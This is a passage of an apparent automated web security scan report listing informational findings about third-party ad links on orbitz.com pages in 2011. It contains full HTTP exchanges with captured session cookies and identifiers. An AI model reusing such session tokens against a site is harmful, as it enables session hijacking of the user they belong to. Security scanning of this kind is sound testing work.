Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
<div id="ad">
    <iframe allowtransparency="true" height="340" width="550" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111384&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111384&" height="340" width="550" border="0"></a>
...[SNIP]...

19.222. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="ad">
            <iframe allowtransparency="true" height="340" width="550" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&" height="340" width="550" border="0"></a>
...[SNIP]...

19.223. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=bfe6&r=h HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:34:31 GMT
Content-Length: 157657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
        </noscript>
...[SNIP]...
id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
d" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&" height="280" width="336" border="0"></a>
...[SNIP]...
ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&" height="55" width="120" border="0"></a>
...[SNIP]...
="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

19.224. http://www.orbitz.com/App/ViewFlightSearchResults

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<div id="hotwireTop">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&" height="30" width="475" border="0"></a>
...[SNIP]...
<div onClick="isSessionTimedOut(event, false, 'msgB');">
